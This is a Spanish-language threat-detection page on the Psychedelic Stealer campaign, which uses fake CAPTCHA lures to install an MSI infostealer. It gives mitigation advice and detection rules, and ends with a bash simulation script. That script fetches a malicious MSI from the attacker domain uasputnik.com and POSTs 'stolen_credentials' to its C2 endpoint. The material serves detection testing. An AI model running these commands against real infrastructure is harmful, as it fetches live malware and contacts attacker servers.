El Ladrón Psicodélico: Cuando un CAPTCHA se Convierte en un Instalador
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Arctic Wolf Labs está rastreando una campaña que utiliza señuelos de CAPTCHA falsos de Cloudflare inyectados en sitios web de empresas ucranianas comprometidas. El ataque al estilo ClickFix convence a los usuarios de ejecutar un paquete MSI que instala Psychedelic Stealer, un infostealer diseñado para recopilar credenciales del navegador, tokens de cuentas y datos de billeteras de criptomonedas. El malware también admite tareas remotas persistentes a través de infraestructura C2 dedicada.
Investigación
La investigación descubrió iframes inyectados en sitios web ucranianos legítimos que redireccionan a los visitantes hacia un flujo de verificación falso. Los analistas también identificaron un panel de gestión de señuelos denominado Rublevka TDS, que controla las configuraciones de comando y registra la telemetría de los visitantes. El análisis técnico de la carga útil MSI reveló una URL de siguiente etapa cifrada junto con las rutinas principales del malware para el robo de credenciales y datos.
Mitigación
Las organizaciones deben monitorear la ejecución sospechosa de Windows Installer (msiexec.exe) iniciado por navegadores web o interfaces de línea de comandos. El filtrado web debe bloquear dominios maliciosos conocidos, mientras que los defensores también deben monitorear los activos web legítimos para detectar inyecciones de iframe no autorizadas. Fortalecer los controles de los endpoints en torno a la creación de tareas programadas puede reducir aún más el riesgo de persistencia.
Respuesta
Cuando se detecta actividad de Psychedelic Stealer, aísle los endpoints afectados para detener la exfiltración de datos o el movimiento lateral. Audite los perfiles de los navegadores y el almacenamiento local en busca de credenciales comprometidas, tokens de autenticación y datos de billetera. Revise la telemetría de la red para detectar comunicaciones con infraestructura C2 conocida e inspeccione los sistemas en busca de tareas programadas no autorizadas o hosts de mensajería nativa sospechosos.
Flujo de Ataque
Detecciones
Entrada de RunMRU sospechosa con semántica de LOLBin (mediante registry_event)
Intento de instalación remota de archivo MSI (mediante cmdline)
Posibles comunicaciones C2 sobre HTTP a IP directa con puerto poco común (mediante proxy)
Descarga de archivo sospechosa IP directa (mediante proxy)
IOCs (HashSha256) para detectar: Psychedelic Stealer: Cuando un CAPTCHA se convierte en un instalador
IOCs (SourceIP) para detectar: Psychedelic Stealer: Cuando un CAPTCHA se convierte en un instalador
IOCs (DestinationIP) para detectar: Psychedelic Stealer: Cuando un CAPTCHA se convierte en un instalador
Detección de acceso a la infraestructura de Psychedelic Stealer [Servidor web]
Ejecución de Simulaciones
-
Narrativa del Ataque y Comandos: El adversario pretende infectar un objetivo mediante un mecanismo falso de CAPTCHA. La simulación imitará el comportamiento del navegador de la víctima: primero, navegando a la página de destino del atacante para evitar escrutinio inicial; luego, solicitando la carga útil maliciosa MSI; y finalmente, iniciando una conexión C2 a través de un POST HTTP al script de control del atacante. Esta secuencia está diseñada para imitar los patrones de URI exactos identificados en la infraestructura de Psychedelic Stealer.
-
Script de Prueba de Regresión: El siguiente script usa
curlpara simular las tres etapas distintas de la lógica de detección.#!/bin/bash # Script de simulación para acceso a la infraestructura de Psychedelic Stealer TARGET_DOMAIN="uasputnik.com" echo "[+] Iniciando simulación de infraestructura de Psychedelic Stealer..." # Etapa 1: Simular la visita a la página de destino (Selección 1) echo "[*] Simulando solicitud GET a la página de destino..." curl -s -X GET "http://$TARGET_DOMAIN/sputnik.html" -o /dev/null # Etapa 2: Simular la descarga del MSI malicioso (Selección 2) echo "[*] Simulando solicitud GET para carga útil..." curl -s -X GET "http://$TARGET_DOMAIN/elita.msi" -o /dev/null # Etapa 3: Simular comunicación C2 vía POST (Selección 3) echo "[*] Simulando solicitud POST al endpoint C2..." curl -s -X POST "http://$TARGET_DOMAIN/admin777111777.php" -d "data=stolen_credentials" -o /dev/null echo "[+] Simulación completa. Verifique SIEM para alertas." -
Comandos de Limpieza:
# Dado que esta es una simulación basada en la red, no se crean archivos en el sistema local # a menos que se solicite específicamente. No se requiere limpieza para el sistema de archivos local. echo "[+] Limpieza completa."